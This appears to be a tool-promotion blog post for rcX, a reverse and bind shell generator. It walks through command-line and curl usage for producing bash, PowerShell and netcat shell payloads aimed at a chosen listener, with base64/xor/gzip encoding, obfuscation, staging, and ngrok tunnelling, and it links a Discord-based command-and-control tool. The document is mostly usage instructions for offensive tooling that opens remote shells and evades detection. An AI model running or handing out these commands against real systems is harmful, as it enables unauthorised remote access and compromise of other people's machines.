rcX A Powerful Reverse Shell Generator

rcX A Powerful Reverse Shell Generator

·2 min read

rcX: A Powerful Reverse Shell Generator

A powerful reverse shell generator

“rc” – stands for remote command or remote code.

“X” – you can understand as assistant or tool.

The predecessor of rcX is rsGe n(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator. More features will be added in the future.

Local use

pip install -r requirements.txt or Download the packaged binaries

CLI Usage

Example:

1.Get a bash reverse shell and output in tabular format.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table

rcX CLI usage

2. Custom shell path.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"

3. Copy the specified id payload to the clipboard.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5

4. Get a base64 encoded bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64

5. Get a xor encoded and obfuscated bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7

Example obfuscated bash reverse shell

6. Get a staging bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0

Example staging bash reverse shell

7. Get a staging bash reverse shell and forward local port using ngrok tunnel.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp

8. Get a Windows Powershell reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows

Web UI

At the same time, rcX also provides a web interface. Use rcX as a server then you can use it with your team or friends. Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end

Example:

python rcX.py -w

Web CLI

When rcX is running as a server, you can use curl in terminal to get the payload.

Example:

1. Get a bash reverse shell payload

curl http://127.0.0.1/linux/bash/127.0.0.4/8888

Example reverse shell payload

2. Base64 encoded

See also

Bifrost C2 Post-exploitation using Discord API

Bifrost: C2 Post-exploitation using Discord API

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64

3. Base64 and hex encoded

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex

4. Gzip compress and replace_char(obfuscation method)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char

5. xor encoded and reverse(obfuscation method)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse

6. Get a Windows powershell reverse shell payload

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444

7. replace_char (obfuscation method) only without using encoder

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char

8. Only use staging, without any encoder and obfuscator

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1

9. Get a bind linux netcat shell payload

curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888

Dark Mode

rcX (this link opens in a new window) by FlyfishSec (this link opens in a new window)

A powerful reverse shell generator